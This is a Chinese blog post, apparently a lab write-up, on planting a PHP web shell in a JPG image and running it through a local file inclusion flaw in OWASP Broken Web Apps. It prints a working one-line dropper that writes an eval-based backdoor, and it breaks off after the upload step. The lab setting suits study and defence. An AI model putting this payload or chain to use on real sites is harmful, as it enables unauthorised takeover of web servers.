高安全级别文件上传结合文件包含漏洞渗透web实验

本文介绍了一次针对中低安全级别文件包含漏洞的渗透实验。实验中,尽管网站限制了只能上传jpg图片,但通过在图片中注入木马并利用本地文件包含漏洞,成功执行了隐藏的木马,最终获取了web shell。实验过程涉及文件包含原理、图片木马注入、文件上传及利用文件包含漏洞执行木马。
摘要由CSDN通过智能技术生成

中低安全级别的文件包含漏洞利用

实验环境

kali
owasp_broken_web_apps
windows 10

实验工具

中国菜刀,burpsuit,图片木马插入工具,一句话木马

实验内容:
打开owasp_broken_web_apps的网址并将文件上传漏洞安全级别为高级即只可以上传,后缀为jpg格式的图片,无法上传php文件,也无法通过代理绕过,(即使通过代理修改后缀绕过,一句话木马功不能得到发挥,不可执行删改等操作),此时web网站正好有本地文件包含漏洞。则可以利用此漏洞将隐藏在图片中的木马执行。

文件包含:
是一个方便与开发人员缩减代码量的一种方法。直接将另一个文件调用过来。

实验过程:
在网络上下载一张小图片,将器拖拽到edjpgom工具上,打开工具后,在空白处写上小马:
<?fputs(fopen("shell66.php","w"),'<?php eval($_POST[moyi]);?>') ?>
点击OK注入图片。
在这里插入图片描述将刚刚注入的图片上传到目标网站:
在这里插入图片描述文件上传后,我们使用网站后台,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值